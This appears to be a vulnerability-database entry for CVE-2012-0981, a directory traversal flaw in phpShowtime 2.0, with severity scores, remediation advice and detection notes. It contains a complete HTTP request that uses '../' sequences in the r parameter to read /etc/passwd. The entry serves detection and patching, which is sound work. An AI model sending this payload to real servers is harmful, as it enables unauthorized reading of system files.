🔙 목록으로 돌아가기

CVE-2012-0981: phpShowtime 2.0 - Directory Traversal

TitlephpShowtime 2.0 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
RemediationUpgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.
CVSS Score5
EPSS Score0.08793
CVE IDCVE-2012-0981
CWE IDCWE-22
Tags cve cve2012 phpshowtime edb lfi kybernetika vuln

🔍 Vulnerability Description

A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.

🌐 HTTP Request

GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-0981.yaml

🦈 Packet Capture: ⬇️ Download cve-2012-0981.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A